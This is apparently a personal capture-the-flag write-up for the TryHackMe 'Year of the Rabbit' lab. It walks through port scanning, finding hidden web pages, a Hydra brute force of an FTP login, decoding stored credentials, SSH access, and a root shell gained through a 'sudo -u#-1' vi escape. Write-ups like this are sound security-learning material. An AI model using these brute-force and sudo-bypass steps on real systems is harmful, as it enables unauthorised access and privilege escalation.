# TryHackMe-YearOfRabbit >Abdullah Rizwan | 09:12 PM , 18th October ## NMAP ``` Nmap scan report for Host is up (0.17s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) | 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) | 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) |_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Apache2 Debian Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds ``` ## PORT 80 Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video. ## Burpsuite Intercept the request on `/sup3r_s3cret_fl4g/` Now visiting the page `/WExYY2Cv-qU` We will find an image running `strings` on image ``` Eh, you've earned this. Username for FTP is ftpuser One of these is the password: Mou+56n%QK8sr 1618B0AUshw1M A56IpIl%1s02u vTFbDzX9&Nmu? FfF~sfu^UQZmT 8FF?iKO27b~V0 ua4W~2-@y7dE$ 3j39aMQQ7xFXT Wb4--CTc4ww*- u6oY9?nHv84D& 0iBp4W69Gr_Yf TS*%miyPsGV54 C77O3FIy0c0sd O14xEhgg0Hxz1 5dpv#Pr$wqH7F 1G8Ucoce1+gS5 0plnI%f0~Jw71 0kLoLzfhqq8u& kS9pn5yiFGj6d zeff4#!b5Ib_n rNT4E4SHDGBkl KKH5zy23+S0@B 3r6PHtM4NzJjE gm0!!EC1A0I2? HPHr!j00RaDEi 7N+J9BYSp4uaY PYKt-ebvtmWoC 3TN%cD_E6zm*s eo?@c!ly3&=0Z nR8&FXz$ZPelN eE4Mu53UkKHx# 86?004F9!o49d SNGY0JjA5@0EE trm64++JZ7R6E 3zJuGL~8KmiK^ CR-ItthsH%9du yP9kft386bB8G A-*eE3L@!4W5o GoM^$82l&GA5D 1t$4$g$I+V_BH 0XxpTd90Vt8OL j0CN?Z#8Bp69_ G#h~9@5E5QA5l DRWNM7auXF7@j Fw!if_=kk7Oqz 92d5r$uyw!vaE c-AA7a2u!W2*? zy8z3kBi#2e36 J5%2Hn+7I6QLt gL$2fmgnq8vI* Etb?i?Kj4R=QM 7CabD7kwY7=ri 4uaIRX~-cY6K4 kY1oxscv4EB2d k32?3^x1ex7#o ep4IPQ_=ku@V8 tQxFJ909rd1y2 5L6kpPR5E2Msn 65NX66Wv~oFP2 LRAQ@zcBphn!1 V4bt3*58Z32Xe ki^t!+uqB?DyI 5iez1wGXKfPKQ nJ90XzX&AnF5v 7EiMd5!r%=18c wYyx6Eq-T^9#@ yT2o$2exo~UdW ZuI-8!JyI6iRS PTKM6RsLWZ1&^ 3O$oC~%XUlRO@ KW3fjzWpUGHSW nTzl5f=9eS&*W WS9x0ZF=x1%8z Sr4*E4NT5fOhS hLR3xQV*gHYuC 4P3QgF5kflszS NIZ2D%d58*v@R 0rJ7p%6Axm05K 94rU30Zx45z5c Vi^Qf+u%0*q_S 1Fvdp&bNl3#&l zLH%Ot0Bw&c%9 ``` ## Hydra ``` hydra -l ftpuser -P passwords.txt -t 4 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01 [DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task [DATA] attacking [21][ftp] host: login: ftpuser password: 5iez1wGXKfPKQ [STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03 ``` ## FTP ``` root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp Connected to 220 (vsFTPd 3.0.2) Name ( ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Jan 23 2020 . drwxr-xr-x 2 0 0 4096 Jan 23 2020 .. -rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt 226 Directory send OK. ftp> ``` On getting `Eli's_Creds.txt` we will find brainfuck language ``` +++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+ ++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->--- --<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++ +<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+ ++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++ <]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++ <]>+. <+++[ ->--- <]>-- ---.- ----. < ``` `https://www.dcode.fr/brainfuck-language` on decoding it ``` User: eli Password: DSpDiM1wAEwid ``` This may be the ssh password for `eli` ## SSH ``` root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@ The authenticity of host ' (' can't be established. ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '' (ECDSA) to the list of known hosts. eli@'s password: 1 new message Message from Root to Gwendoline: "Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there" END MESSAGE eli@year-of-the-rabbit:~$ ``` ``` eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null /usr/games/s3cr3t ``` ``` cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! Your password is awful, Gwendoline. It should be at least 60 characters long! Not just MniVCQVhQHUNI Honestly! Yours sincerely -Root ``` ## Previlege Escalation ``` sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt ``` on the vim editor :!sh ``` # bash ```